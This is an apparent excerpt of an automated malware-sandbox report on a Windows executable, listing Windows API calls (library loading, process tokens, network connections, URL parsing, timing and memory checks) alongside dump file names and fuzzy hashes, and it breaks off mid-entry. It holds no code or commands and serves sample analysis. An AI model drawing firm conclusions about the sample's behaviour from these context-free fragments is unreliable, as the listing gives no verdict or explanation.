                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                    • String ID:
                                                                                                    • API String ID: 737400349-0
                                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                    • Instruction ID: 66a04a1d869950e0cdf5bb13ea439dbdb65293ffe8de1569a6c4a32ddb76f804
                                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                    • Instruction Fuzzy Hash: 5901D733100149BBDF126F95CD46EEB7B6DEF58754F068018FE4866121C632E9619BA0
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00AA13C6,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue), ref: 00AD30A5
                                                                                                    • GetLastError.KERNEL32(?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000,00000364,?,00AD2E46), ref: 00AD30B1
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AD301A,00AA13C6,00000000,00000000,00000000,?,00AD328B,00000006,FlsSetValue,00B42290,FlsSetValue,00000000), ref: 00AD30BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                                                                                                    • Instruction ID: ebb143d9faea073a6fffa4f4d991eecbaf62ab193b52a03026e235580765cdf1
                                                                                                    • Opcode Fuzzy Hash: 0d1989a52d1022e2790106119aa590c69a31e7eed13f2aaec88a12b75be1ce2e
                                                                                                    • Instruction Fuzzy Hash: 0601F737701222ABCF314BB8AC44A5B7BA8AF05B61B240621F907F7340CB21D901C7E1
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00B0747F
                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00B07497
                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00B074AC
                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00B074CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 1352324309-0
                                                                                                    • Opcode ID: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                                                                                                    • Instruction ID: fee56db19181c9d57f01b22fed666847d10173763b33b94b4b06ce0471f8a3e2
                                                                                                    • Opcode Fuzzy Hash: 4618238d7980e061c8aeb0facefd4d40aec48762c772ca754d3deb53ffd40033
                                                                                                    • Instruction Fuzzy Hash: 3F11A5B56453149BE7208F54EC48F9ABFFCEB00700F108599A556D7291DB70F904DB90
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0C4
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0E9
                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B0F3
                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B0ACD3,?,00008000), ref: 00B0B126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2875609808-0
                                                                                                    • Opcode ID: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                                                                                                    • Instruction ID: f333a79e0e4da3b9ce0fe2d4a771abef6f28afd7a7f2452dc5669616c44ad783
                                                                                                    • Opcode Fuzzy Hash: 1cc80e1f234cc7c9cfe67fa5ee7b6ea25a57f69d2184e5e59cc915beb6aaf8a7
                                                                                                    • Instruction Fuzzy Hash: 8C113931C01928E7CF00AFE4E998AEEBFB8FF09711F204085D941B3181CF305A609B91
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B02DDD
                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2710830443-0
                                                                                                    • Opcode ID: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                                                                                                    • Instruction ID: e7d80db41cc31785d2511c15d5d85596ed4b68347d4f8a27583ecc8a06840fa5
                                                                                                    • Opcode Fuzzy Hash: 68dc53d12940f1c1605e0ad1b05a2633211429303a292c152dc33efee3e0c3e7
                                                                                                    • Instruction Fuzzy Hash: 7DE06D711016247ADB201BA29C0EEEB3EACEB42BA1F200165B506E30809AA0C844C7B0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                                                                                                      • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                                                                                                      • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                                                                                                      • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B38887
                                                                                                    • LineTo.GDI32(?,?,?), ref: 00B38894
                                                                                                    • EndPath.GDI32(?), ref: 00B388A4
                                                                                                    • StrokePath.GDI32(?), ref: 00B388B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                    • String ID:
                                                                                                    • API String ID: 1539411459-0
                                                                                                    • Opcode ID: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                                                                                                    • Instruction ID: 618a08b7f96d188843ed0cb4fed212e643049274d1f11a2dca1993f8878fbaf4
                                                                                                    • Opcode Fuzzy Hash: e9403cd43884345fa7cf2fe108de89211a87e1fd735521089e8d8a6adf1c8820
                                                                                                    • Instruction Fuzzy Hash: D5F03A36045698BADB125F98AC09FCE3F69AF06310F248040FB12760E2CB755552DBA5
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 00AB98CC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00AB98D6
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00AB98E9
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00AB98F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                                                                                                    • Instruction ID: a4d73356115d98faf36c557c4b6677229e9122babcbfdc2583161b6f0c5af825
                                                                                                    • Opcode Fuzzy Hash: 97fac2afafd2dd5754c46cc2d314445956a7e22333ff246c14e5c8936c7a4d94
                                                                                                    • Instruction Fuzzy Hash: 35E06531244644AADB215BB4AC09BED3F10AB11336F148219F7F5650E1C77146409B10
                                                                                                    APIs
                                                                                                    • GetCurrentThread.KERNEL32 ref: 00B01634
                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0163B
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B011D9), ref: 00B01648
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B011D9), ref: 00B0164F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974789173-0
                                                                                                    • Opcode ID: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                                                                                                    • Instruction ID: 8f1b5bc116ccca74bf5f4f1c458487157694c60a8c38d60de56fbde9a0251a10
                                                                                                    • Opcode Fuzzy Hash: bdd293fc4fa3851b9d04bb01c8f730571b7c5e644ddd9d32a82860d7e716f3f4
                                                                                                    • Instruction Fuzzy Hash: 54E08C32602211EBD7201FE4AE0DB8B3FBCEF44792F248848F245EA080EB348444CB68
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00AFD858
                                                                                                    • GetDC.USER32(00000000), ref: 00AFD862
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                                                                                                    • ReleaseDC.USER32(?), ref: 00AFD8A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                                                                                                    • Instruction ID: 35e102deb06b1ea719f7306840f429b6aa64830a2f7a42ce7b1b2123659b4a7b
                                                                                                    • Opcode Fuzzy Hash: f8db0f73a3b7575637ca4d37bc5aaaaf11c9d35360f38cccaed9b8c2c5ead22d
                                                                                                    • Instruction Fuzzy Hash: E8E0EEB1800204EFCB41AFE09909A6DBFB6AB08310F208009F846E7260CB388901AF40
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00AFD86C
                                                                                                    • GetDC.USER32(00000000), ref: 00AFD876
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AFD882
                                                                                                    • ReleaseDC.USER32(?), ref: 00AFD8A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                                                                                                    • Instruction ID: 31586898d86c9dbae025b7c04a42a57f6921b23b12c39d643440399137ff39ec
                                                                                                    • Opcode Fuzzy Hash: f75c17e53570466e86fb808c0c10bae6b4127064850c3184d653ad09c98ebc99
                                                                                                    • Instruction Fuzzy Hash: 7EE092B5800604EFCB51AFE0D94D66DBFB5BB08311F248449F94AF7260DB389905EF50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B14ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Connection_wcslen
                                                                                                    • String ID: *$LPT
                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                    • Opcode ID: 242f87928a75de5f825e95e229244c4571c7ef90468f52ad588916b7a0cd7526
                                                                                                    • Instruction ID: 503c3641bef2ef37bca95aa7d9dfa8728f68a7dd51ecd9d51e3d53541dc50393
                                                                                                    • Opcode Fuzzy Hash: 242f87928a75de5f825e95e229244c4571c7ef90468f52ad588916b7a0cd7526
                                                                                                    • Instruction Fuzzy Hash: 05914E75A002049FCB14DF58C584EAABBF5EF49304F5980D9E40A9F3A2D735EE86CB91
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00ACE30D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                                                                                                    • Instruction ID: 0951936a016ff3ccf52fb20f2fb460e6c6e25b35a06aeb124f0ed6375bbfb124
                                                                                                    • Opcode Fuzzy Hash: 3f06c317d414488da217314f0576030eeae553fc8b653249f6797fd653a7a33b
                                                                                                    • Instruction Fuzzy Hash: B6513A71A0C20296CB19F718CA42BBD3BA4AB40740F754D9EF0D7873A9FF358C959A46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    • Opcode ID: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                                                                                                    • Instruction ID: 9a6222cd3d8cbfdeeee66695a2cdecff7aeae3941563a8362b014628a3fd1683
                                                                                                    • Opcode Fuzzy Hash: 9617db29867a8469b2247261e84b9df9aa36654287cd79d9e0fcd168ebeda9f5
                                                                                                    • Instruction Fuzzy Hash: BC51353550428ADFDF15EFA8C0816FA7BB8EF26310F244065F9919B2E1DB349D42CBA0
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00ABF2A2
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ABF2BB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                    • String ID: @
                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                    • Opcode ID: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                                                                                                    • Instruction ID: 7a44677deacfad1bf89c0fcebeefe454daa6035caae625874e02bcd1e6df3843
                                                                                                    • Opcode Fuzzy Hash: e48f51c1c8e83644c522e88857d93a400ff60e87cca254ac797d1bb7b4f92d1f
                                                                                                    • Instruction Fuzzy Hash: 355134714087449FE320AF14DD86BAFBBF8FB85710F81885DF199421A5EB708529CB66
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B257E0
                                                                                                    • _wcslen.LIBCMT ref: 00B257EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                    • String ID: CALLARGARRAY
                                                                                                    • API String ID: 157775604-1150593374
                                                                                                    • Opcode ID: 3dc591f714f6e9ae0e541303745a38a9ea77629b2f1522a8273b336619a3d542
                                                                                                    • Instruction ID: 375bc85d92a00d12b43923cf3bc1a1b419d27738e0c5035382be02ab5b261ed6
                                                                                                    • Opcode Fuzzy Hash: 3dc591f714f6e9ae0e541303745a38a9ea77629b2f1522a8273b336619a3d542
                                                                                                    • Instruction Fuzzy Hash: BB41B331E001199FCB14DFA8D9819FEBBF9FF59320F1040A9E509AB291EB749D81CB90
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00B1D130
                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B1D13A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                    • String ID: |
                                                                                                    • API String ID: 596671847-2343686810
                                                                                                    • Opcode ID: b71c253b25b857e117a65a547f31953e55ba1bb17e11412346f0cc940e15b714
                                                                                                    • Instruction ID: d76ca67f1c17f29550907ca2a8947d009a8d6640d7fc0ac1fa8d1a0c6ecd2d96
